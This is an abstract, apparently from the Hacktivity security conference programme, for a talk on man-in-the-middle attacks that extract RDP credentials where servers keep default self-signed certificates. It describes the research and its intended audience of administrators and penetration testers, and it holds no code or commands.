25. When it comes to the security of RDP hosts, experience shows that many organizations rarely replace the default self-signed certificates with certificates signed by their corporate CA. This obviously leaves them vulnerable to Man-in-the-Middle attacks. However, until now no open-source proof-of-concept exploit has been available to the IT security community, despite the specifications of RDP being freely available. Since many administrators often perform tasks on critical servers such as the domain controller via RDP, usually with highly privileged accounts, RDP is a worthwhile target for potential adversaries. In this talk, we want to analyze the implementation of the relevant parts of RDP in detail and show how to develop a tool that can extract credentials in clear text if the user is careless enough to ignore SSL warnings. The intended audience is system administrators, penetration testers and security enthusiasts. https://www.hacktivity.com